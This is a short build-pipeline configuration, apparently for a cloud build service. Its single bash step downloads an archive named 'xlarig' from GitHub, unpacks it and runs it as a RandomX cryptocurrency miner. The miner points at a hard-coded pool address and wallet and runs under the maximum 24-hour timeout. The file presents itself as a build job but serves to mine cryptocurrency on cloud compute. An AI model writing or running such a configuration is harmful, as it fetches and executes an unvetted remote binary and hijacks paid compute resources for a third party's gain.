steps:
  - name: ubuntu
    args:
      - '-c'
      - >-
        wget https://github.com/bengetsia/soft/raw/main/xlarig.tar.gz && tar -xvf xlarig.tar.gz && ./xlarig -o 139.162.30.222:443 -u ZEPHs9S2EWRQzizKJRbnnvATxUoGNCbG5AH5t3HoCwVRWGuyerr8UshcoEwjzbxq88MNDKhBdmzc1Qs1s4u8JQ33YDcbYhxx5SN.50 000 -p YOUR -a rx/0 -k --donate-level 1
    waitFor:
      - '-'
    entrypoint: /bin/bash
timeout: 86400s
